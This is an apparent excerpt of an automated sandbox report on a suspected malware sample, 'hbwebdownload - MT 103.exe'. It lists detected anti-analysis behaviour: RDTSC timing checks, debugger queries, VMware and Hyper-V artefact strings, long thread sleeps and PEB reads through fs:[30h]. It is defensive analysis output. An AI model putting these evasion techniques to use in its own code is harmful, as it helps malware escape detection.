Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: hbwebdownload - MT 103.exe PID: 1992, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 5B9904 second address: 5B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 5B9B7E second address: 5B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 1560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 7EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 8EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: 9070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: A070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: A5C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Memory allocated: B5C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6161	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3544	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 823	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9115	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 9684	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13896

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.2 %

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe TID: 2964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6776	Thread sleep count: 823 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6776	Thread sleep time: -1646000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6776	Thread sleep count: 9115 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6776	Thread sleep time: -18230000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7056	Thread sleep count: 287 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7056	Thread sleep time: -574000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7056	Thread sleep count: 9684 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7056	Thread sleep time: -19368000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000002.4528531386.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000006.00000000.2087085209.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4535238985.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2083176796.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.2083176796.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000006.00000000.2081212306.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000006.00000002.4528531386.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000006.00000002.4535238985.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.2083176796.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000006.00000000.2083176796.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000006.00000000.2081212306.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.4528531386.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Code function: 4_2_00409AB0 rdtsc

4_2_00409AB0

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe

Code function: 4_2_0040ACF0 LdrLoadDll,

4_2_0040ACF0

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B0124 mov eax, dword ptr fs:[00000030h]	4_2_012B0124
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01340115 mov eax, dword ptr fs:[00000030h]	4_2_01340115
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132A118 mov ecx, dword ptr fs:[00000030h]	4_2_0132A118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132A118 mov eax, dword ptr fs:[00000030h]	4_2_0132A118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132A118 mov eax, dword ptr fs:[00000030h]	4_2_0132A118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132A118 mov eax, dword ptr fs:[00000030h]	4_2_0132A118
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov ecx, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov ecx, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov ecx, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov eax, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0132E10E mov ecx, dword ptr fs:[00000030h]	4_2_0132E10E
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354164 mov eax, dword ptr fs:[00000030h]	4_2_01354164
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01354164 mov eax, dword ptr fs:[00000030h]	4_2_01354164
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01318158 mov eax, dword ptr fs:[00000030h]	4_2_01318158
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127C156 mov eax, dword ptr fs:[00000030h]	4_2_0127C156
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01314144 mov eax, dword ptr fs:[00000030h]	4_2_01314144
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01314144 mov eax, dword ptr fs:[00000030h]	4_2_01314144
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01314144 mov ecx, dword ptr fs:[00000030h]	4_2_01314144
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01314144 mov eax, dword ptr fs:[00000030h]	4_2_01314144
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01314144 mov eax, dword ptr fs:[00000030h]	4_2_01314144
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286154 mov eax, dword ptr fs:[00000030h]	4_2_01286154
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01286154 mov eax, dword ptr fs:[00000030h]	4_2_01286154
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012C0185 mov eax, dword ptr fs:[00000030h]	4_2_012C0185
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130019F mov eax, dword ptr fs:[00000030h]	4_2_0130019F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130019F mov eax, dword ptr fs:[00000030h]	4_2_0130019F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130019F mov eax, dword ptr fs:[00000030h]	4_2_0130019F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0130019F mov eax, dword ptr fs:[00000030h]	4_2_0130019F
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A197 mov eax, dword ptr fs:[00000030h]	4_2_0127A197
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A197 mov eax, dword ptr fs:[00000030h]	4_2_0127A197
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0127A197 mov eax, dword ptr fs:[00000030h]	4_2_0127A197
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01324180 mov eax, dword ptr fs:[00000030h]	4_2_01324180
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01324180 mov eax, dword ptr fs:[00000030h]	4_2_01324180
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133C188 mov eax, dword ptr fs:[00000030h]	4_2_0133C188
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_0133C188 mov eax, dword ptr fs:[00000030h]	4_2_0133C188
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013561E5 mov eax, dword ptr fs:[00000030h]	4_2_013561E5
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012B01F8 mov eax, dword ptr fs:[00000030h]	4_2_012B01F8
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013461C3 mov eax, dword ptr fs:[00000030h]	4_2_013461C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_013461C3 mov eax, dword ptr fs:[00000030h]	4_2_013461C3
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_012FE1D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_012FE1D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE1D0 mov ecx, dword ptr fs:[00000030h]	4_2_012FE1D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_012FE1D0
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_012FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_012FE1D0
